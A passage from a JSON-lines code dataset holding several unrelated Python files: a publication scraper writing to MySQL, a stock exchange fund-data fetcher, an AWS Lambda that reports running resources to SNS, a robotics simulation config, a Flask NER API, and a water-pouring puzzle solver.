res[\"citations\"].fillna(0)\n res[\"citations\"] = res[\"citations\"].astype(int)\n\n # Iterate through res dataframe and insert data into output_publications database table.\n for index, row in res.iterrows():\n timestamp = datetime.now()\n citations = row[\"citations\"]\n if citations == \"\" or citations is None:\n citations = 0\n\n else:\n citations = int(citations)\n\n sql = \"INSERT IGNORE INTO output_publications (timestamp, title, authors, abstract, doi, citations, knowledge_base) VALUES (%s, %s, %s, %s, %s, %s, %s)\"\n val = (timestamp, row[\"title\"], row[\"authors\"], row[\"abstract\"], row[\"doi\"], citations, crawler.split(\"crawl_\")[1])\n sql_helper.connection.cursor().execute(sql, val)\n\n # Connection is not autocommit by default. So you must commit to save your changes.\n sql_helper.connection.commit()\n\n print(\"Done scraping \" + crawler + \": \" + professor + \", \" + university)","repo_name":"Forward-UIUC-2021F/bhavesh-manivannan-publication-consolidator","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"16119772440","text":"__author__ = 'changye'\n\nimport json\nimport re\nimport requests\nfrom datetime import datetime, timedelta\nimport tools\nimport logging\n# logging.basicConfig(level=logging.WARNING)\n\ndef getFromUrl(url):\n header = {\n 'User-Agent': \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0\",\n 'Referer': \"http://www.sse.com.cn/assortment/fund/fjlof/netvalue/\",\n 'Connection': \"keep-alive\",\n 'Accept': \"*/*\",\n 'Accept-Encoding': 'gzip, deflate, sdch',\n 'Accept-Language': 'zh-CN,zh;q=0.8'\n }\n url = url + '&_=' + '%d' %int(datetime.now().timestamp() * 1000)\n logging.info(url)\n r = requests.get(url, headers=header, allow_redirects=False)\n logging.info(r.status_code)\n if(r.status_code == 200):\n return r.text\n else:\n return None\n\ndef getJson(text):\n m = re.match(r'mycallback\\(({.*})\\)', text)\n if(m):\n logging.info(m.group(1))\n return json.loads(m.group(1))['result']\n\n\ndef queryFund(*date, query='value'):\n if len(date) < 1:\n queryDate = tools.lastValidMarketDay().strftime('%Y%m%d')\n logging.info('Default date is:\\t' + queryDate)\n else:\n queryDate = datetime.strptime(date[0], '%Y-%m-%d').strftime('%Y%m%d')\n\n if query == 'value':\n queryKeyWord = 'COMMON_SSE_FUND_FJLOF_NETVALUE_CX_S'\n elif query == 'scale':\n queryKeyWord = 'COMMON_SSE_FUND_FJLOF_SCALE_CX_S'\n\n url = 'http://query.sse.com.cn/commonQuery.do?' 
\\\n 'jsonCallBack=mycallback&' \\\n 'isPagination=true&' \\\n 'sqlId=' + queryKeyWord + '&' \\\n 'FILEDATE=' + queryDate + '&' \\\n 'pageHelp.pageSize=10000'\n\n valueText = getFromUrl(url)\n if(valueText):\n values = getJson(valueText)\n\n return values\n # logging.info(values)\n\ndef getFundValue(*date):\n values = queryFund(*date, query='value')\n funds = dict()\n for v in values:\n v['DATE'] = v['ASSESS_DATE']\n v['FUND_NAV'] = (float)(v['NAV'].replace(r',', ''))\n funds[v['FUND_CODE']] = v\n return funds\n\ndef getFundInfo(*date):\n values = queryFund(*date, query='scale')\n funds = dict()\n for v in values:\n v['DATE'] = datetime.strptime(v['TRADE_DATE'], '%Y%m%d').strftime('%Y-%m-%d')\n v['FUND_VOL'] = (int)((float)(v['INTERNAL_VOL'].replace(r',', '')) * 10000)\n funds[v['FUND_CODE']] = v\n return funds\n\n\ndef getFund(*date):\n\n fundInfo = getFundInfo(*date)\n fundValue = getFundValue(*date)\n\n fundIds = set((list)(fundInfo.keys()) + (list)(fundValue.keys()))\n funds = dict()\n\n for f in fundIds:\n fund = dict()\n fund['FUND_VOL'] = fund['FUND_NAV'] = 0\n if f in fundInfo:\n fund['FUND_DATE'] = fundInfo[f]['DATE']\n fund['FUND_VOL'] = fundInfo[f]['FUND_VOL']\n if f in fundValue:\n fund['FUND_NAV'] = fundValue[f]['FUND_NAV']\n funds[f] = fund\n\n return funds\n\n\nif __name__ == '__main__':\n [print(x) for x in getFund().items()]","repo_name":"changye/Stock","sub_path":"shFund.py","file_name":"shFund.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32882601451","text":"import json\nimport boto3\nimport sys\nimport os\n\n# Get list of any chargable active resources (EC2, RDS, volumes/snapshots, EIPs etc)\n# Check if they have an exclusion tag\n# Report both categories to SNS topic\n# Have switch function to allow stopping or even deleting stray resources\n# I test this on a box with python 3.7.10 so I guess run with that version\n\n# Can't seem to get global variables etc to work, makes for a messy way of setting the region\n# Also this isn't about the python, it's about the lambda... 
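\n# Each check_* helper below queries one AWS service through boto3 and returns a newline-separated summary string for the SNS report.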
\n\ndef check_AMI():\n image_list=\"\"\n AWS_region=os.environ['AWS_REGION']\n AMI=boto3.client('ec2', region_name=AWS_region )\n all_images=AMI.describe_images(Owners=['self'])\n for images in all_images['Images']:\n image_list=image_list + images['ImageId'] + \"\\t\" + images['CreationDate'] + '\\n ' \n return image_list\n\n\ndef check_snaps():\n snapshot_list=\"\"\n AWS_region=os.environ['AWS_REGION']\n SNAPS=boto3.client('ec2', region_name=AWS_region )\n all_snaps=SNAPS.describe_snapshots(OwnerIds=['self'])\n for snapshot in all_snaps['Snapshots']:\n snapshot_list=snapshot_list + snapshot['SnapshotId'] + \"\\t\" + str(snapshot['StartTime']) + '\\n ' \n return snapshot_list\n\n\ndef check_RDS():\n instance_list=\"\"\n AWS_region=os.environ['AWS_REGION']\n RDS=boto3.client('rds', region_name=AWS_region )\n\n all_instances=RDS.describe_db_instances()\n for instance in all_instances['DBInstances']:\n instance_list=instance_list + instance['DBInstanceIdentifier'] + \"\\t\" + instance['DBInstanceStatus'] + '\\n '\n return instance_list\n\n\n\ndef check_EC2():\n instance_list=\"\"\n AWS_region=os.environ['AWS_REGION']\n EC2=boto3.resource('ec2', region_name=AWS_region)\n all_instances=EC2.instances.all()\n\n for instance in all_instances:\n # print(f'Tags: {instance.tags.value}')\n instance_list=instance_list +instance.id + \"\\t\" + instance.state[\"Name\"] + '\\n '\n return instance_list \n\n\ndef send_SNS(subject,message):\n sns = boto3.client('sns')\n sns_arn=os.environ['MY_SNS_TOPIC_ARN']\n response = sns.publish(\n TopicArn=sns_arn,\n Message=message,\n Subject=subject,\n )\n\n\ndef lambda_handler(event, context):\n EC2_list=\"\"\n RDS_list=\"\"\n AMI_list=\"\"\n snap_list=\"\"\n action=event['Action']\n if (action ==\"List\"):\n EC2_list=check_EC2()\n RDS_list=check_RDS()\n AMI_list=check_AMI()\n print (\"AMI LIST: \\n\" + AMI_list)\n SNAP_list=check_snaps()\n send_SNS(\"Running Resources:\",\"EC2s:\\n\" + EC2_list + \"\\nRDS Instances:\\n\" + RDS_list + \"\\nAMIs\\n\" + AMI_list+ \"\\nSnapshots:\\n\" + SNAP_list)\n elif (action == \"Debug\"):\n ret_str=(\"PARAMETERS:\\n\" + json.dumps(event) + \"\\nMY_SNS_TOPIC_ARN: \")\n ret_str=(ret_str + \"VARIABLES:\\n\" + os.environ['MY_SNS_TOPIC_ARN'] + \"\\n\" + os.environ['AWS_REGION'])\n send_SNS(\"Debug info\", ret_str)\n else:\n send_SNS(\"ERROR\", json.dumps(event))\n\n\n return {\n 'statusCode': 200,\n 'body': json.dumps(EC2_list + \"\\n\" + RDS_list)\n }\n\n","repo_name":"mikayp1967/lambda","sub_path":"running-resources/list-all.py","file_name":"list-all.py","file_ext":"py","file_size_in_byte":3063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20525128877","text":"# Default config file for all envs. 
Other envs will use these values unless they are specifically overwritten\n# with their own config files.\n\n# note: as a rule of thumb, these values should be as reusable as possible between envs, while values that\n# are expected to change between each env should be actual class parameters.\n\nimport os\nimport numpy as np\n\nimport manipulator_learning\n\n\n# generic defaults for all envs\nMAN_LEARN_DIR = os.path.dirname(manipulator_learning.__file__)\nMODEL_BASE = MAN_LEARN_DIR + '/sim'\nROBOT_URDF_BASE = MODEL_BASE + '/robots'\nOBJECT_URDF_BASE = MODEL_BASE + '/objects/models/urdf'\n\nALL_DEF_CONFIG = dict(\n    # sim\n    time_step=.01,\n    render_opengl_gui=False,\n\n    # cam\n    debug_cam_params=(.20, -.41, .59, 1.6, -29.4, 156.),\n    render_shadows=True,\n    render_ground_plane=True,\n\n    # arm\n    gripper_default_close=False,\n    gripper_force=10,\n    max_gripper_vel=0.8,\n    init_gripper_random_lim=None,\n\n    # base\n    random_base_theta_bounds=(0, 0),\n    base_random_lim=((0, 0, 0), (0, 0, 0)),\n    base_pose_from_workspace_center=True,\n    cam_workspace_distance=.3,\n\n    # objects\n    object_urdf_root=OBJECT_URDF_BASE,\n    block_style='',\n    block_random_lim=[],\n    init_block_pos=[],\n    init_rod_pos=None,\n    rod_random_lim=None,\n    block_colors=None,\n\n    # task\n    goal_type=None,\n    goal_pos=None\n)\n\n# task-specific params\nXYZ_CONFIG = dict(\n    valid_trans_dof=[1, 1, 1],\n    valid_rot_dof=[0, 0, 0]\n)\n\nLIFT_DEFAULTS = dict(\n    block_random_lim=((0.25, 0.25)),\n    goal_type=None,\n)\n\nMULTIVIEW_DEFS = dict(\n    random_base_theta_bounds=(-3 * np.pi / 16, np.pi / 16),\n    base_random_lim=((.02, .02, .002), (0, 0, .02))\n)\n","repo_name":"utiasSTARS/manipulator-learning","sub_path":"manipulator_learning/sim/envs/configs/all_default.py","file_name":"all_default.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"33321741319","text":"from flasgger import Swagger\nfrom flask import Flask\n\nfrom noticias_ner.api.endpoints import ner_api\n\n\ndef __criar_especificacao_swagger():\n    template = {\n        \"info\": {\n            \"title\": \"RiskData NER - Extrator de entidades mencionadas em dados textuais\",\n            \"description\": \"REST web service responsável por expor funcionalidades de extração de entidades em dados \"\n                           \"textuais do RiskData NER.\",\n            \"contact\": {\n                \"responsibleOrganization\": \"TCU / SecexSaúde / NTDI\",\n                \"responsibleDeveloper\": \"Monique Monteiro\",\n                \"email\": \"moniquebm@tcu.gov.br\",\n            },\n            \"version\": \"0.0.1\"\n        },\n    }\n    Swagger(app, template=template)\n\n\napp = Flask(__name__)\n\napp.register_blueprint(ner_api)\n__criar_especificacao_swagger()\n","repo_name":"SecexSaudeTCU/noticias_ner","sub_path":"noticias_ner/api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"pt","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"4666502806","text":"\"\"\"\nAn n-cup water-pouring puzzle written a long time ago\n\"\"\"\n\n\nfrom itertools import product\nfrom copy import deepcopy\n\nclass Node(object):\n    def __init__(self, status, pre=None):\n        self.status = status\n        self.pre = pre\n\n\ndef get_steps(cup_volume, water, objective, deepth):\n    operation = [(x, y) for x, y in product(list(range(len(cup_volume))), repeat=2) if x != y]\n    cup_status = [0]*(len(cup_volume))\n    if water > sum(cup_volume):\n        raise ValueError(\"too much water to fit in the cups\")\n    for i, volume in enumerate(cup_volume):\n        if water <= 0:\n            break\n        if water <= volume:\n            cup_status[i] = water\n            water = 0\n        else:\n            cup_status[i] = volume\n            water -= volume\n    
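# breadth-first search over cup states: status_record holds one frontier list per depth, status_set dedupes visited states\n    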
head = Node(cup_status)\n status_set = {str(cup_status)}\n # independent lists per depth level: [[]]*deepth would alias a single list\n status_record = [[head]] + [[] for _ in range(deepth)]\n for i in range(deepth):\n for node in status_record[i]:\n cup_status = node.status\n for x, y in operation:\n next_cup_status = deepcopy(cup_status)\n residue_water = cup_volume[y] - cup_status[y]\n if cup_status[x] >= residue_water:\n next_cup_status[x] = cup_status[x] - residue_water\n next_cup_status[y] = cup_volume[y]\n else:\n next_cup_status[y] = cup_status[y] + cup_status[x]\n next_cup_status[x] = 0\n cur_node = Node(next_cup_status, pre=node)\n if objective in next_cup_status:\n return cur_node\n if str(next_cup_status) not in status_set:\n status_record[i+1].append(cur_node)\n status_set.add(str(next_cup_status))\n return False\n\n\ndef find_method(cup_volume, water, objective, deepth):\n last_node = get_steps(cup_volume, water, objective, deepth)\n if last_node:\n result = []\n p = last_node\n while True:\n cup_status = p.status\n result.append(cup_status)\n p = p.pre\n if p is None:\n break\n print(result[::-1])\n else:\n print('No solution within {} steps'.format(deepth))\n\n\nfind_method([10, 5, 6], 11, 8, 10)","repo_name":"mikuh/some_algorithm","sub_path":"pour_water.py","file_name":"pour_water.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"24160776855","text":"import random\nimport logging\nimport sys\nimport os\nimport math\nfrom collections import deque\nimport argparse\nimport pickle\n\n\nclass QLearning:\n def __init__(self, num_actions=4, learning_rate=0.1, discount_factor=0.9):\n self.matrix = {}\n self.num_actions = num_actions\n self.learning_rate = learning_rate\n self.discount_factor = discount_factor\n\n def update(self, state, action, reward, next_state):\n if state not in self.matrix:\n self.matrix[state] = [0] * self.num_actions\n if next_state not in self.matrix:\n self.matrix[next_state] = [0] * self.num_actions\n\n q_s_a = self.matrix[state][action]\n max_q_next = max(self.matrix[next_state])\n alpha = self.learning_rate\n r = reward\n gamma = self.discount_factor\n # standard Q-learning update: Q(s,a) <- (1-alpha)*Q(s,a) + alpha*(r + gamma*max_a' Q(s',a'))\n self.matrix[state][action] = (1 - alpha)*q_s_a + alpha*(r + gamma*max_q_next)\n\n\nclass Puzzle:\n def __init__(self, init_state=(7, 2, 4, 5, 0, 6, 8, 3, 1), size=3, blank_pos=None):\n\n # State Definition\n # A puzzle state like this\n # a b c\n # d e f\n # g h i\n # will be flattened to the tuple (a, b, c, d, e, f, g, h, i) to represent the state.\n\n # Assume init_state and size make sense\n self.state = init_state\n self.size = size\n self.blank_pos = self.idx_to_pos(self.state.index(0)) if blank_pos is None else blank_pos\n\n @property\n def goal_state(self):\n return (0, 1, 2, 3, 4, 5, 6, 7, 8)\n\n def idx_to_pos(self, idx):\n return idx // self.size, idx % self.size\n\n def pos_to_idx(self, row, col):\n return row * self.size + col\n\n def next_states_actions(self):\n r, c = self.blank_pos\n ret = []\n # Up\n if r > 0:\n # swap the blank with the piece on top\n state = list(self.state)\n state[self.pos_to_idx(r, c)] = self.state[self.pos_to_idx(r - 1, c)]\n state[self.pos_to_idx(r - 1, c)] = 0\n p = Puzzle(tuple(state), self.size, (r - 1, c))\n ret.append((p, 0))\n # Right\n if c < self.size - 1:\n # swap the blank with the piece on the right\n state = list(self.state)\n state[self.pos_to_idx(r, c)] = self.state[self.pos_to_idx(r, c + 1)]\n state[self.pos_to_idx(r, c + 1)] = 0\n p = Puzzle(tuple(state), self.size, (r, c + 1))\n ret.append((p, 1))\n # Down\n if r < self.size - 1:\n # swap the blank with the piece below\n state = 
list(self.state)\n state[self.pos_to_idx(r, c)] = self.state[self.pos_to_idx(r + 1, c)]\n state[self.pos_to_idx(r + 1, c)] = 0\n p = Puzzle(tuple(state), self.size, (r + 1, c))\n ret.append((p, 2))\n # Left\n if c > 0:\n # swap the blank with the piece on the left\n state = list(self.state)\n state[self.pos_to_idx(r, c)] = self.state[self.pos_to_idx(r, c - 1)]\n state[self.pos_to_idx(r, c - 1)] = 0\n p = Puzzle(tuple(state), self.size, (r, c - 1))\n ret.append((p, 3))\n return ret\n\n def move(self, action):\n # assume action is legal\n r, c = self.blank_pos\n if action == 0:\n state = list(self.state)\n state[self.pos_to_idx(r, c)] = self.state[self.pos_to_idx(r - 1, c)]\n state[self.pos_to_idx(r - 1, c)] = 0\n self.blank_pos = r - 1, c\n self.state = tuple(state)\n elif action == 1:\n state = list(self.state)\n state[self.pos_to_idx(r, c)] = self.state[self.pos_to_idx(r, c + 1)]\n state[self.pos_to_idx(r, c + 1)] = 0\n self.blank_pos = r, c + 1\n self.state = tuple(state)\n elif action == 2:\n state = list(self.state)\n state[self.pos_to_idx(r, c)] = self.state[self.pos_to_idx(r + 1, c)]\n state[self.pos_to_idx(r + 1, c)] = 0\n self.blank_pos = r + 1, c\n self.state = tuple(state)\n elif action == 3:\n state = list(self.state)\n state[self.pos_to_idx(r, c)] = self.state[self.pos_to_idx(r, c - 1)]\n state[self.pos_to_idx(r, c - 1)] = 0\n self.blank_pos = r, c - 1\n self.state = tuple(state)\n\n def reward(self):\n return 100000 if self.has_won() else -0.1\n\n def has_won(self):\n return self.state == self.goal_state\n\n def __repr__(self):\n return f'{self.state}'\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-e', '--episode', type=int, help='Number of episodes to train. Default: 30000.')\n parser.add_argument('-l', '--load', help='Load a pretrained Q-Matrix.', action='store_true')\n args = parser.parse_args()\n\n # Logger setup\n log_file_path = 'result.txt'\n try:\n os.remove(log_file_path)\n except OSError:\n pass\n log_file = logging.FileHandler(log_file_path)\n stdout = logging.StreamHandler(sys.stdout)\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n logger.addHandler(log_file)\n logger.addHandler(stdout)\n\n if args.load:\n try:\n file_name = input('Specify file to load: ')\n with open(file_name, 'rb') as f:\n q = pickle.load(f)\n logger.debug(f'Successfully loaded \\'{file_name}\\'')\n except OSError:\n logger.debug('Failed to load Q-Matrix')\n logger.debug('Empty matrix employed\\n')\n q = QLearning()\n else:\n q = QLearning()\n\n if args.episode is None:\n total_episode = 100000\n else:\n total_episode = args.episode\n\n if total_episode == 0:\n logger.debug(f'Skip training...')\n else:\n logger.debug(f'Start training {total_episode} episodes...')\n\n # For displaying average iteration count for last 100 episodes\n last_hundred_iters = deque()\n last_hundred_iter_sum = 0\n\n # Run episodes\n for episode in range(total_episode):\n # Reset puzzle\n p = Puzzle()\n i = 0\n score = 0\n\n # Initial exploit chance is 30%\n initial_exploit_chance = 0.3\n # It grows linearly reaching 80% at the last episode\n exploit_chance = initial_exploit_chance + (0.8 - initial_exploit_chance) * episode / total_episode\n\n while not p.has_won():\n i += 1\n next_states_actions = p.next_states_actions()\n\n # Exploit if possible and lucky\n if p.state in q.matrix and random.uniform(0, 1) <= exploit_chance:\n best_action = None\n best_next_p = None\n best_q = -math.inf\n for next_p, action in next_states_actions:\n if best_q < q.matrix[p.state][action]:\n 
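# strict '<' keeps the earliest action on ties while tracking the argmax of Q[s][a]\n 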
best_q = q.matrix[p.state][action]\n best_next_p, best_action = next_p, action\n next_p, action = best_next_p, best_action\n # Explore otherwise\n else:\n random.shuffle(next_states_actions)\n next_p, action = next_states_actions[0]\n reward = next_p.reward()\n score += reward\n q.update(p.state, action, reward, next_p.state)\n p = next_p\n\n # Housekeeping for last 100 episodes avg iterations\n if episode >= 100:\n last_hundred_iter_sum -= last_hundred_iters.popleft()\n last_hundred_iters.append(i)\n last_hundred_iter_sum += i\n avg = last_hundred_iter_sum / (100 if episode >= 100 else episode + 1)\n\n logger.debug(f'Episode #{episode + 1} ended in {i} moves. Score={score}. Q-Matrix Size={len(q.matrix)}. Avg moves of last 100 eps: {avg}')\n\n logger.debug('\\nTraining Complete')\n logger.debug('Save trained Q-Matrix? (y/n)')\n if input() == 'y':\n try:\n file_name = input('Save as: ')\n with open(file_name, 'wb') as f:\n pickle.dump(q, f)\n logger.debug(f'Successfully saved Q-Matrix as \\'{file_name}\\'')\n except OSError:\n logger.debug('Failed to save Q-Matrix')\n\n # Solve puzzle in question\n logger.debug('\\nSolving puzzle in question...\\n')\n p = Puzzle()\n i = 0\n while not p.has_won():\n i += 1\n logger.debug(f'Move #{i}:')\n logger.debug(f'State before move: {p}')\n logger.debug(f'Q matrix for current state: {q.matrix[p.state]}')\n action = q.matrix[p.state].index(max(q.matrix[p.state]))\n logger.debug(f'Chosen action: {action}')\n p.move(action)\n logger.debug(f'State after move: {p}\\n')\n logger.debug(f'Solved in {i} moves.')\n\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"jiyolla/IEE4122-optimization-in-AI","sub_path":"HW2/sliding_puzzle.py","file_name":"sliding_puzzle.py","file_ext":"py","file_size_in_byte":8709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28782511514","text":"import math\nfrom queue import PriorityQueue\nfrom typing import Tuple, Set, Optional\n\nfrom main.model.dataclass import Container, StackLocation, StackTierLocation\n\nfrom main.model.batch.realizedBatch import RealizedBatch\nfrom main.model.dataclass.block import Block\nfrom main.model.dataclass.terminal import Terminal\nfrom main.model.noSolutionError import NoSolutionError\nfrom main.model.util.prioritizedItem import PrioritizedItem\n\n\ndef terminal_unique_outcomes(terminal: Terminal, batch: RealizedBatch) -> Set[Tuple[Terminal, int]]:\n if batch.length() == 0:\n return {(terminal, 0)}\n if batch.inbound:\n return _unique_inbound_outcomes(terminal, batch)\n else:\n t = terminal.reveal_order(batch.containers)\n return _unique_outbound_outcomes(t, batch)\n\n\ndef _unique_inbound_outcomes(initial_terminal: Terminal, batch: RealizedBatch) -> Set[Tuple[Terminal, int]]:\n # q = ((-i, reshuffles)), term)\n q = PriorityQueue()\n q.put(PrioritizedItem((0, 0), initial_terminal))\n abstract_added = set()\n result = set()\n while not q.empty():\n item = q.get(block=False)\n (i, reshuffles) = item.priority\n i = -i\n terminal = item.item\n\n # check if this is end state\n if i == batch.length():\n result.add((terminal, reshuffles))\n else:\n # not yet explored, need to add children to queue\n current_container = batch.containers[i]\n store_outcomes = store_locations(terminal, current_container, None)\n for new_term in store_outcomes:\n\n new_term_abstracted = new_term.abstract()\n if new_term_abstracted not in abstract_added:\n new_i = i + 1\n abstract_added.add(new_term_abstracted)\n q.put(PrioritizedItem((-new_i, reshuffles), 
new_term))\n if len(result) == 0:\n raise NoSolutionError(\"Could not find suitable solutions for batch: {}\\n terminal:\\n{}\"\n .format(batch, initial_terminal))\n return result\n\n\ndef _unique_outbound_outcomes(initial_terminal: Terminal, batch: RealizedBatch) \\\n -> Set[Tuple[Terminal, int]]:\n # q = ((-i, reshuffles)), term)\n q = PriorityQueue()\n q.put(PrioritizedItem((0, 0), initial_terminal))\n abstract_added = set()\n result = set()\n min_reshuffles = math.inf\n while not q.empty():\n item = q.get(block=False)\n (i, reshuffles) = item.priority\n i = -i\n terminal = item.item\n\n # if reshuffles is bigger than the current min reshuffles, disregard this option\n if reshuffles > min_reshuffles:\n continue\n\n # check if this is end state\n if i == batch.length():\n min_reshuffles = reshuffles\n result.add((terminal, reshuffles))\n else:\n # not yet explored, need to add children to queue\n current_container = batch.containers[i]\n # store_outcomes = __store_locations(terminal, current_container, None)\n handling_outcomes, is_reshuffle = handle_outbound_container(terminal, current_container)\n new_i = i + int(not is_reshuffle)\n new_reshuffles = reshuffles + int(is_reshuffle)\n for new_term in handling_outcomes:\n new_term_abstracted = new_term.abstract()\n if new_term_abstracted not in abstract_added:\n abstract_added.add(new_term_abstracted)\n q.put(PrioritizedItem((-new_i, new_reshuffles), new_term))\n if len(result) == 0:\n raise NoSolutionError(\"Could not find suitable solutions for batch: {}\\n terminal:\\n{}\"\n .format(batch, initial_terminal))\n return result\n\n\ndef handle_outbound_container(terminal: Terminal, container: Container) -> Tuple[Set[Terminal], bool]:\n current_stack_tier_location = terminal.container_location(container)\n blocking_containers = terminal.blocking_containers(current_stack_tier_location)\n\n if len(blocking_containers) > 0:\n blocking_container_location = terminal.container_location(blocking_containers[0])\n term, blocking_container = terminal.retrieve_container(blocking_container_location[:2])\n reshuffle_outcomes = store_locations(term, blocking_container, current_stack_tier_location)\n return reshuffle_outcomes, True\n else:\n new_terminal, retrieved_container = terminal.retrieve_container(current_stack_tier_location[:-1])\n return {new_terminal}, False\n\n\ndef store_locations(terminal: Terminal, container: Container,\n exclude_target_stack_tier_location: Optional[StackTierLocation]) \\\n -> Set[Terminal]:\n # max_stack_height = terminal.max_height\n result = set()\n blocks_visited = set()\n\n for block_index in range(terminal.nr_blocks()):\n block = terminal.blocks[block_index]\n if block not in blocks_visited:\n blocks_visited.add(block)\n for stack_index in range(len(block.stacks)):\n stack_location = (block_index, stack_index)\n # check if container may be placed in this location\n if valid_store_location(terminal, stack_location, exclude_target_stack_tier_location):\n new_term = terminal.store_container((block_index, stack_index), container)\n result.add(new_term)\n\n return result\n\n\n\n\n\ndef valid_store_location(terminal: Terminal,\n stack_location: StackLocation,\n target_stack_tier_location: Optional[StackTierLocation]):\n # stack is not full\n max_stack_height = terminal.max_height\n non_full = terminal.stack_height(stack_location) < max_stack_height\n\n if not non_full:\n return False\n\n # a container may not be stored when the target container is located in the same stack\n if target_stack_tier_location is not None and 
stack_location == target_stack_tier_location[:-1]:\n return False\n\n # if bay is empty, stack_location must be in the middle, otherwise must be against a neighbouring\n if not correct_bay_location(terminal, stack_location):\n return False\n\n # stack must be reachable\n if not _reachable(terminal.blocks[stack_location[0]], stack_location[1]):\n return False\n\n # if target stack tier is supplied, it is not allowed to store a container below the diagonal of the target container\n return below_diagonal(terminal, stack_location, target_stack_tier_location)\n\n\ndef correct_bay_location(terminal: Terminal, stack_location: StackLocation):\n block = terminal.blocks[stack_location[0]]\n if block.two_way:\n return _correct_bay_location_two_way(block, stack_location)\n else:\n return _correct_bay_location_one_way(block, stack_location)\n\n\ndef _correct_bay_location_one_way(block: Block, stack_location: StackLocation):\n nr_stacks = len(block.stacks)\n # if bay is empty, must be placed all the way to the right\n if all_empty_in_range(block, range(nr_stacks)):\n return stack_location[1] == nr_stacks-1\n\n # if stack already has a container placed on it, it is allowed to build on top of it\n if block.stacks[stack_location[1]].height() > 0:\n return True\n\n # if there exist an empty stack to the right of the given stack, it is not a valid position\n if exist_empty_in_range(block, range(stack_location[1]+1)):\n return False\n\n # if above checks hold, it is a valid location according to this rule\n return True\n\n\ndef _correct_bay_location_two_way(block: Block, stack_location: StackLocation):\n nr_stacks = len(block.stacks)\n stack_index = stack_location[1]\n # if bay is emtpy, must be placed in the middle\n if all_empty_in_range(block, range(nr_stacks)):\n return nr_stacks <= 2 or len(block.stacks) // 2 == stack_location[1]\n\n # if stack already has a container placed on it, it is allowed to build on top of it\n if block.stacks[stack_index].height() > 0:\n return True\n\n # direct neighbour stack must not be empty and other side must all be empty\n # right neighbour, left empty:\n right_neighbour = has_container(block, stack_index+1) and all_empty_in_range(block, range(stack_index))\n\n # left neighbour, right empty:\n return right_neighbour or (has_container(block, stack_index-1) and all_empty_in_range(block, range(stack_index+1, nr_stacks)))\n\n\ndef below_diagonal(terminal: Terminal, stack_location: StackLocation, target_stack_tier: Optional[StackTierLocation]):\n # if target stack tier is None, the check on diagonal is not needed\n if target_stack_tier is None:\n return True\n\n # if bays are different, the check on diagonal is not needed\n if stack_location[0] != target_stack_tier[0]:\n return True\n\n block = terminal.blocks[stack_location[0]]\n target_tier = target_stack_tier[2]\n target_stack_index = target_stack_tier[1]\n stack_index = stack_location[1]\n stack_distance = abs(target_stack_index - stack_index)\n\n if stack_index < target_stack_index:\n # target is on the right, thus needs to be below diagonal\n diagonal = (block.stacks[stack_index].height()) < (target_tier - stack_distance) and _reachable_left(block, stack_index)\n else:\n # target is on the left, thus needs to be above diagonal\n diagonal = (block.stacks[stack_index].height()) > (target_tier + stack_distance) and _reachable_left(block, stack_index)\n\n if block.two_way and not diagonal:\n if stack_index < target_stack_index:\n # target is on the left, thus needs to be above diagonal\n diagonal = 
(block.stacks[stack_index].height()) > (target_tier + stack_distance) and _reachable_right(block, stack_index)\n else:\n # target is on the right, thus needs to be below diagonal\n diagonal = (block.stacks[stack_index].height()) < (target_tier - stack_distance) and _reachable_right(block, stack_index)\n\n return diagonal\n\n\n\ndef exist_empty_in_range(block: Block, iterator):\n for stack_index in iterator:\n stack = block.stacks[stack_index]\n if stack.height() == 0:\n return True\n return False\n\n\ndef all_empty_in_range(block: Block, iterator):\n for stack_index in iterator:\n stack = block.stacks[stack_index]\n if stack.height() > 0:\n return False\n return True\n\n\ndef has_container(block: Block, stack_index: int):\n in_range = 0 <= stack_index < len(block.stacks)\n return in_range and block.stacks[stack_index].height() > 0\n\n\ndef _reachable_right(block: Block, stack_location: int):\n return block.two_way and _reachable_base(block, stack_location, range(stack_location + 1, len(block.stacks)))\n\n\ndef _reachable_left(block: Block, stack_location: int):\n return _reachable_base(block, stack_location, range(stack_location))\n\n\ndef _reachable_base(block: Block, stack_location: int, iterator):\n stack_height = block.stacks[stack_location].height()\n for i in iterator:\n stack_distance = abs(stack_location - i)\n i_height = block.stacks[i].height()\n below_diagonal = i_height <= (stack_height - stack_distance) or i_height == 0\n if not below_diagonal:\n return False\n return True\n\n\ndef _reachable(block: Block, stack_location: int):\n stack_height = block.stacks[stack_location].height()\n reachable = True\n for i in range(stack_location):\n stack_distance = stack_location - i\n i_height = block.stacks[i].height()\n below_diagonal = i_height <= (stack_height - stack_distance) or i_height == 0\n if not below_diagonal:\n reachable = False\n break\n\n if block.two_way and not reachable:\n reachable = True\n for i in range(stack_location + 1, len(block.stacks)):\n stack_distance = i - stack_location\n i_height = block.stacks[i].height()\n below_diagonal = i_height <= (stack_height - stack_distance) or i_height == 0\n if not below_diagonal:\n reachable = False\n break\n return reachable\n","repo_name":"boschma2702/ContainerStacking","sub_path":"main/model/dataclass/outcomes.py","file_name":"outcomes.py","file_ext":"py","file_size_in_byte":12097,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"16676519057","text":"#using with keyword while writing to a file, so that no need to close the file again & again\nimport os\nfileName = os.getcwd() + '\\\\withwrite.txt'\n\nwith open(fileName, 'w') as fo :\n fo.write('Hello Java\\n')\n fo.write('Hello Python\\n')\n\"\"\"\nHello Java\nHello 